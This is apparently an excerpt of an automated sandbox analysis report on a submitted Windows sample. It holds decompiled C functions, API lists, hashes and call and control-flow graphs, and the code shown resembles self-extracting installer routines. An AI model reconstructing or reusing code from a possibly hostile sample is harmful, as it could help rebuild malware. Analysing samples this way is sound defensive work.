                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1214682469-0
                                                                                                                                                                                                        • Opcode ID: 54bfed3e0fab59eb534e7ee91ea791b9fd606bce9a994c46e963156820c0da2f
                                                                                                                                                                                                        • Instruction ID: 3ac175f858538b8a494fa7da3c172d41d1b72658dd94d7117d6c2381acdbf8d2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54bfed3e0fab59eb534e7ee91ea791b9fd606bce9a994c46e963156820c0da2f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A80149B210020DBBCB105F69AC48DBB7A6CEF853A0F050125FF04B3160DB76CC50C6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F3680(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct tagMSG _v36;
                                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                                                        				_t16 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                        					if(_t8 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							if(_v36.message != 0x12) {
                                                                                                                                                                                                        								DispatchMessageA( &_v36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t16 = 1;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                        						} while (_t8 != 0);
                                                                                                                                                                                                        						if(_t16 == 0) {
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t8;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x001f368c
                                                                                                                                                                                                        0x001f368f
                                                                                                                                                                                                        0x001f3691
                                                                                                                                                                                                        0x001f369f
                                                                                                                                                                                                        0x001f36a7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f36ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f36bc
                                                                                                                                                                                                        0x001f36bc
                                                                                                                                                                                                        0x001f36c0
                                                                                                                                                                                                        0x001f36cb
                                                                                                                                                                                                        0x001f36c2
                                                                                                                                                                                                        0x001f36c4
                                                                                                                                                                                                        0x001f36c4
                                                                                                                                                                                                        0x001f36da
                                                                                                                                                                                                        0x001f36e0
                                                                                                                                                                                                        0x001f36e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f36e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f36ba
                                                                                                                                                                                                        0x001f36ed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 001F369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001F36B2
                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 001F36CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001F36DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: b15fc7327ea4dee90b5718de476d270dc49bc29badbac6224795b15a94f61acd
                                                                                                                                                                                                        • Instruction ID: def8c81356b441649cedf8d673621705c15e141c8707c6c37d8d5924b3ffb63e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b15fc7327ea4dee90b5718de476d270dc49bc29badbac6224795b15a94f61acd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7701A77290421977DB304BA65C4CEFF767CEBC5B20F050119FA15E2180D664C780C670
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E001F65E8(char* __ecx) {
                                                                                                                                                                                                        				char _t3;
                                                                                                                                                                                                        				char _t10;
                                                                                                                                                                                                        				char* _t12;
                                                                                                                                                                                                        				char* _t14;
                                                                                                                                                                                                        				char* _t15;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                                                        				_t15 = __ecx;
                                                                                                                                                                                                        				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                        				_t10 = 0;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t3 =  *_t12;
                                                                                                                                                                                                        					_t12 =  &(_t12[1]);
                                                                                                                                                                                                        				} while (_t3 != 0);
                                                                                                                                                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                        					if(_t16 <= _t15) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *_t16 == 0x5c) {
                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                        							_t16 = CharNextA(_t16);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t16 = _t10;
                                                                                                                                                                                                        						_t10 = 1;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(_t16);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return _t10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *_t16 == 0x5c) {
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        0x001f65e8
                                                                                                                                                                                                        0x001f65ed
                                                                                                                                                                                                        0x001f65ef
                                                                                                                                                                                                        0x001f65f2
                                                                                                                                                                                                        0x001f65f4
                                                                                                                                                                                                        0x001f65f4
                                                                                                                                                                                                        0x001f65f6
                                                                                                                                                                                                        0x001f65f7
                                                                                                                                                                                                        0x001f6608
                                                                                                                                                                                                        0x001f6611
                                                                                                                                                                                                        0x001f6618
                                                                                                                                                                                                        0x001f661c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f660e
                                                                                                                                                                                                        0x001f6623
                                                                                                                                                                                                        0x001f6625
                                                                                                                                                                                                        0x001f663b
                                                                                                                                                                                                        0x001f663b
                                                                                                                                                                                                        0x001f663d
                                                                                                                                                                                                        0x001f6641
                                                                                                                                                                                                        0x001f6610
                                                                                                                                                                                                        0x001f6610
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6610
                                                                                                                                                                                                        0x001f6644
                                                                                                                                                                                                        0x001f6647
                                                                                                                                                                                                        0x001f6647
                                                                                                                                                                                                        0x001f6621
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,001F2B33), ref: 001F6602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 001F6612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 001F6629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 001F6635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: c042b44964039f01b78b560b7a001154cea27068f8fb2996c090b4d39beca573
                                                                                                                                                                                                        • Instruction ID: e732773d7acc7c8ab3850865829141e98651cab58fc23ec596c46b755ebb4b4e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c042b44964039f01b78b560b7a001154cea27068f8fb2996c090b4d39beca573
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35F028720081556EE7321B288CC88BBBF9CCF8B374B2A01AFE69AD2501D7190D46C761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F69B0() {
                                                                                                                                                                                                        				intOrPtr* _t4;
                                                                                                                                                                                                        				intOrPtr* _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				 *0x1f81f8 = E001F6C70();
                                                                                                                                                                                                        				__set_app_type(E001F6FBE(2));
                                                                                                                                                                                                        				 *0x1f88a4 =  *0x1f88a4 | 0xffffffff;
                                                                                                                                                                                                        				 *0x1f88a8 =  *0x1f88a8 | 0xffffffff;
                                                                                                                                                                                                        				_t4 = __p__fmode();
                                                                                                                                                                                                        				_t11 =  *0x1f8528; // 0x0
                                                                                                                                                                                                        				 *_t4 = _t11;
                                                                                                                                                                                                        				_t5 = __p__commode();
                                                                                                                                                                                                        				_t12 =  *0x1f851c; // 0x0
                                                                                                                                                                                                        				 *_t5 = _t12;
                                                                                                                                                                                                        				_t6 = E001F7000();
                                                                                                                                                                                                        				if( *0x1f8000 == 0) {
                                                                                                                                                                                                        					__setusermatherr(E001F7000);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E001F71EF(_t6);
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x001f69b7
                                                                                                                                                                                                        0x001f69c2
                                                                                                                                                                                                        0x001f69c8
                                                                                                                                                                                                        0x001f69cf
                                                                                                                                                                                                        0x001f69d8
                                                                                                                                                                                                        0x001f69de
                                                                                                                                                                                                        0x001f69e4
                                                                                                                                                                                                        0x001f69e6
                                                                                                                                                                                                        0x001f69ec
                                                                                                                                                                                                        0x001f69f2
                                                                                                                                                                                                        0x001f69f4
                                                                                                                                                                                                        0x001f6a00
                                                                                                                                                                                                        0x001f6a07
                                                                                                                                                                                                        0x001f6a0d
                                                                                                                                                                                                        0x001f6a0e
                                                                                                                                                                                                        0x001f6a15

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 001F6FC5
                                                                                                                                                                                                        • __set_app_type.MSVCRT ref: 001F69C2
                                                                                                                                                                                                        • __p__fmode.MSVCRT ref: 001F69D8
                                                                                                                                                                                                        • __p__commode.MSVCRT ref: 001F69E6
                                                                                                                                                                                                        • __setusermatherr.MSVCRT ref: 001F6A07
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1632413811-0
                                                                                                                                                                                                        • Opcode ID: 228245aba37d0569d058935fad2d25c4528644f8726b96b0888b2dab1a0cd3a1
                                                                                                                                                                                                        • Instruction ID: c6614ec8c1bfe181a165569ebd4866cfebcaad1f7de76388d90514e57f635df4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 228245aba37d0569d058935fad2d25c4528644f8726b96b0888b2dab1a0cd3a1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4F015B02083099FC719AB30ED0A6383BA1FF15331B500609F5AA86AF1CF3E85C5CB15
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                        callgraph 0 Function_00DE43D0 30 Function_00DE6CE0 0->30 1 Function_00DE4CD0 1->30 32 Function_00DE47E0 1->32 37 Function_00DE4E99 1->37 49 Function_00DE4980 1->49 85 Function_00DE476D 1->85 91 Function_00DE4B60 1->91 105 Function_00DE4702 1->105 112 Function_00DE4C37 1->112 2 Function_00DE4AD0 50 Function_00DE3680 2->50 3 Function_00DE17C8 4 Function_00DE66C8 76 Function_00DE6648 4->76 5 Function_00DE58C8 43 Function_00DE658A 5->43 47 Function_00DE6285 5->47 48 Function_00DE1680 5->48 54 Function_00DE44B9 5->54 6 Function_00DE67C9 39 Function_00DE6793 6->39 7 Function_00DE4CC0 8 Function_00DE4BC0 9 Function_00DE30C0 10 Function_00DE63C0 10->30 10->43 52 Function_00DE1781 10->52 11 Function_00DE70FE 12 Function_00DE4EFD 12->30 12->49 12->91 13 Function_00DE2BFB 41 Function_00DE1F90 13->41 55 Function_00DE52B6 13->55 60 Function_00DE2CAA 13->60 97 Function_00DE2F1D 13->97 14 Function_00DE66F9 15 Function_00DE6EF0 16 Function_00DE34F0 16->0 16->50 16->54 17 Function_00DE6CF0 18 Function_00DE36EE 18->6 25 Function_00DE28E8 18->25 18->30 45 Function_00DE2A89 18->45 18->54 96 Function_00DE681F 18->96 19 Function_00DE17EE 19->30 20 Function_00DE3FEF 20->30 20->47 20->54 98 Function_00DE411B 20->98 21 Function_00DE71EF 22 Function_00DE6BEF 23 Function_00DE70EB 24 Function_00DE1AE8 24->4 24->30 24->43 46 Function_00DE1A84 24->46 24->48 24->52 24->54 56 Function_00DE16B3 24->56 59 Function_00DE2AAC 24->59 95 Function_00DE171E 24->95 25->45 81 Function_00DE2773 25->81 26 Function_00DE65E8 27 Function_00DE51E5 42 Function_00DE468F 27->42 27->47 27->54 28 Function_00DE4FE0 28->12 28->42 28->54 29 Function_00DE31E0 30->17 31 Function_00DE24E0 31->30 31->43 32->48 32->54 33 Function_00DE19E0 33->0 33->30 34 Function_00DE1FE1 35 Function_00DE5C9E 35->4 35->29 35->30 35->43 35->48 35->54 78 Function_00DE667F 35->78 99 Function_00DE5C17 35->99 115 Function_00DE6E2A 35->115 36 Function_00DE6298 36->30 36->95 37->48 38 Function_00DE6495 38->30 38->43 38->52 40 Function_00DE2390 40->30 40->40 40->43 40->48 40->56 41->30 41->54 61 Function_00DE1EA7 41->61 43->56 44 Function_00DE268B 44->30 44->54 44->95 46->78 48->52 49->54 80 Function_00DE487A 49->80 51 Function_00DE6380 53 Function_00DE6FBE 70 Function_00DE6F54 53->70 54->6 54->30 54->48 54->95 54->96 55->26 55->30 55->34 55->40 55->52 56->52 57 Function_00DE69B0 57->21 57->53 83 Function_00DE6C70 57->83 109 Function_00DE7000 57->109 58 Function_00DE66AE 59->3 59->26 59->30 59->48 60->18 60->30 60->35 60->40 60->42 60->54 65 Function_00DE18A3 60->65 100 Function_00DE6517 60->100 84 Function_00DE256D 61->84 62 Function_00DE6FA5 75 Function_00DE724D 62->75 63 Function_00DE3BA2 63->20 63->24 63->30 63->38 63->42 63->47 63->52 63->54 88 Function_00DE2267 63->88 114 Function_00DE202A 63->114 64 Function_00DE72A2 65->19 65->30 66 Function_00DE55A0 66->30 66->42 66->43 66->47 66->52 66->54 72 Function_00DE6952 66->72 79 Function_00DE597D 66->79 87 Function_00DE5467 66->87 66->100 113 Function_00DE2630 66->113 67 Function_00DE4CA0 68 Function_00DE53A1 68->30 68->43 68->48 68->95 69 Function_00DE6FA1 70->75 104 Function_00DE7208 70->104 71 Function_00DE7155 73 Function_00DE4A50 74 Function_00DE3450 74->0 77 Function_00DE6F40 78->76 79->30 79->44 79->47 79->54 103 Function_00DE490C 80->103 81->30 81->43 81->48 81->52 82 Function_00DE7270 84->31 85->58 85->100 86 Function_00DE4169 86->42 86->54 87->5 87->30 87->43 87->47 87->48 87->52 87->68 87->79 88->30 88->43 88->95 89 Function_00DE5164 89->36 89->42 89->54 90 Function_00DE7060 101 Function_00DE7010 90->101 118 Function_00DE7120 90->118 92 Function_00DE6A60 92->13 92->71 92->75 92->90 92->104 111 Function_00DE6C3F 92->111 93 Function_00DE6760 94 Function_00DE621E 94->30 94->47 94->54 94->79 96->14 96->30 97->27 97->30 97->43 97->47 97->54 97->63 97->66 97->84 97->86 97->89 97->94 110 Function_00DE3A3F 97->110 116 Function_00DE3B26 97->116 98->61 100->54 102 Function_00DE3210 102->0 102->5 102->43 102->54 102->79 117 Function_00DE4224 102->117 105->48 105->56 106 Function_00DE6C03 106->75 107 Function_00DE3100 107->0 108 Function_00DE4200 110->42 110->47 110->54 110->100 113->30 113->54 114->30 114->43 114->54 114->95 115->17 116->28 116->36 116->100 117->48 117->54 119 Function_00DE6A20

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 36 de3ba2-de3bd9 37 de3bfd-de3bff 36->37 38 de3bdb-de3bee call de468f 36->38 40 de3c03-de3c28 memset 37->40 44 de3bf4-de3bf7 38->44 45 de3d13-de3d30 call de44b9 38->45 42 de3c2e-de3c40 call de468f 40->42 43 de3d35-de3d48 call de1781 40->43 42->45 54 de3c46-de3c49 42->54 49 de3d4d-de3d52 43->49 44->37 44->45 56 de3f4d 45->56 52 de3d9e-de3db6 call de1ae8 49->52 53 de3d54-de3d6c call de468f 49->53 52->56 67 de3dbc-de3dc2 52->67 53->45 69 de3d6e-de3d75 53->69 54->45 58 de3c4f-de3c56 54->58 62 de3f4f-de3f63 call de6ce0 56->62 59 de3c58-de3c5e 58->59 60 de3c60-de3c65 58->60 64 de3c6e-de3c73 59->64 65 de3c67-de3c6d 60->65 66 de3c75-de3c7c 60->66 70 de3c87-de3c89 64->70 65->64 66->70 73 de3c7e-de3c82 66->73 71 de3de6-de3de8 67->71 72 de3dc4-de3dce 67->72 75 de3fda-de3fe1 69->75 76 de3d7b-de3d98 CompareStringA 69->76 70->49 78 de3c8f-de3c98 70->78 79 de3dee-de3df5 71->79 80 de3f0b-de3f15 call de3fef 71->80 72->71 77 de3dd0-de3dd7 72->77 73->70 81 de3fe8-de3fea 75->81 82 de3fe3 call de2267 75->82 76->52 76->75 77->71 84 de3dd9-de3ddb 77->84 85 de3c9a-de3c9c 78->85 86 de3cf1-de3cf3 78->86 87 de3fab-de3fd2 call de44b9 LocalFree 79->87 88 de3dfb-de3dfd 79->88 91 de3f1a-de3f1c 80->91 81->62 82->81 84->79 92 de3ddd-de3de1 call de202a 84->92 94 de3c9e-de3ca3 85->94 95 de3ca5-de3ca7 85->95 86->52 90 de3cf9-de3d11 call de468f 86->90 87->56 88->80 96 de3e03-de3e0a 88->96 90->45 90->49 98 de3f1e-de3f2d LocalFree 91->98 99 de3f46-de3f47 LocalFree 91->99 92->71 102 de3cb2-de3cc5 call de468f 94->102 95->56 103 de3cad 95->103 96->80 104 de3e10-de3e19 call de6495 96->104 106 de3fd7-de3fd9 98->106 107 de3f33-de3f3b 98->107 99->56 102->45 114 de3cc7-de3ce8 CompareStringA 102->114 103->102 112 de3e1f-de3e36 GetProcAddress 104->112 113 de3f92-de3fa9 call de44b9 104->113 106->75 107->40 116 de3e3c-de3e80 112->116 117 de3f64-de3f76 call de44b9 FreeLibrary 112->117 126 de3f7c-de3f90 LocalFree call de6285 113->126 114->86 115 de3cea-de3ced 114->115 115->86 119 de3e8b-de3e94 116->119 120 de3e82-de3e87 116->120 117->126 124 de3e9f-de3ea2 119->124 125 de3e96-de3e9b 119->125 120->119 128 de3ead-de3eb6 124->128 129 de3ea4-de3ea9 124->129 125->124 126->56 131 de3eb8-de3ebd 128->131 132 de3ec1-de3ec3 128->132 129->128 131->132 133 de3ece-de3eec 132->133 134 de3ec5-de3eca 132->134 137 de3eee-de3ef3 133->137 138 de3ef5-de3efd 133->138 134->133 137->138 139 de3eff-de3f09 FreeLibrary 138->139 140 de3f40 FreeLibrary 138->140 139->98 140->99
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00DE3BA2() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				short _v300;
                                                                                                                                                                                                        				intOrPtr _v304;
                                                                                                                                                                                                        				void _v348;
                                                                                                                                                                                                        				char _v352;
                                                                                                                                                                                                        				intOrPtr _v356;
                                                                                                                                                                                                        				signed int _v360;
                                                                                                                                                                                                        				short _v364;
                                                                                                                                                                                                        				char* _v368;
                                                                                                                                                                                                        				intOrPtr _v372;
                                                                                                                                                                                                        				void* _v376;
                                                                                                                                                                                                        				intOrPtr _v380;
                                                                                                                                                                                                        				char _v384;
                                                                                                                                                                                                        				signed int _v388;
                                                                                                                                                                                                        				intOrPtr _v392;
                                                                                                                                                                                                        				signed int _v396;
                                                                                                                                                                                                        				signed int _v400;
                                                                                                                                                                                                        				signed int _v404;
                                                                                                                                                                                                        				void* _v408;
                                                                                                                                                                                                        				void* _v424;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                                                        				short _t96;
                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                                                        				signed int _t108;
                                                                                                                                                                                                        				int _t112;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				signed char _t118;
                                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                                                        				void* _t128;
                                                                                                                                                                                                        				struct HINSTANCE__* _t129;
                                                                                                                                                                                                        				void* _t130;
                                                                                                                                                                                                        				short _t137;
                                                                                                                                                                                                        				char* _t140;
                                                                                                                                                                                                        				signed char _t144;
                                                                                                                                                                                                        				signed char _t145;
                                                                                                                                                                                                        				signed int _t149;
                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                        				signed int _t153;
                                                                                                                                                                                                        				void* _t155;
                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                        				signed int _t157;
                                                                                                                                                                                                        				signed int _t162;
                                                                                                                                                                                                        				signed int _t164;
                                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                        				_t69 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                        				_t153 = 0;
                                                                                                                                                                                                        				 *0xde9124 =  *0xde9124 & 0;
                                                                                                                                                                                                        				_t149 = 0;
                                                                                                                                                                                                        				_v388 = 0;
                                                                                                                                                                                                        				_v384 = 0;
                                                                                                                                                                                                        				_t165 =  *0xde8a28 - _t153; // 0x0
                                                                                                                                                                                                        				if(_t165 != 0) {
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t127 = 0;
                                                                                                                                                                                                        					_v392 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                        						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                        						_t164 = _t164 + 0xc;
                                                                                                                                                                                                        						_v348 = 0x44;
                                                                                                                                                                                                        						if( *0xde8c42 != 0) {
                                                                                                                                                                                                        							goto L26;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t146 =  &_v396;
                                                                                                                                                                                                        						_t115 = E00DE468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							_t146 = 0x4b1;
                                                                                                                                                                                                        							E00DE44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        							 *0xde9124 = 0x80070714;
                                                                                                                                                                                                        							goto L62;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(_v396 != 1) {
                                                                                                                                                                                                        								__eflags = _v396 - 2;
                                                                                                                                                                                                        								if(_v396 != 2) {
                                                                                                                                                                                                        									_t137 = 3;
                                                                                                                                                                                                        									__eflags = _v396 - _t137;
                                                                                                                                                                                                        									if(_v396 == _t137) {
                                                                                                                                                                                                        										_v304 = 1;
                                                                                                                                                                                                        										_v300 = _t137;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L14;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(6);
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								_pop(0);
                                                                                                                                                                                                        								goto L11;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								L11:
                                                                                                                                                                                                        								_v300 = 0;
                                                                                                                                                                                                        								L14:
                                                                                                                                                                                                        								if(_t127 != 0) {
                                                                                                                                                                                                        									L27:
                                                                                                                                                                                                        									_t155 = 1;
                                                                                                                                                                                                        									__eflags = _t127 - 1;
                                                                                                                                                                                                        									if(_t127 != 1) {
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t132 =  &_v280;
                                                                                                                                                                                                        										_t76 = E00DE1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                        										__eflags = _t76;
                                                                                                                                                                                                        										if(_t76 == 0) {
                                                                                                                                                                                                        											L62:
                                                                                                                                                                                                        											_t77 = 0;
                                                                                                                                                                                                        											L63:
                                                                                                                                                                                                        											_pop(_t150);
                                                                                                                                                                                                        											_pop(_t156);
                                                                                                                                                                                                        											_pop(_t128);
                                                                                                                                                                                                        											return E00DE6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t157 = _v404;
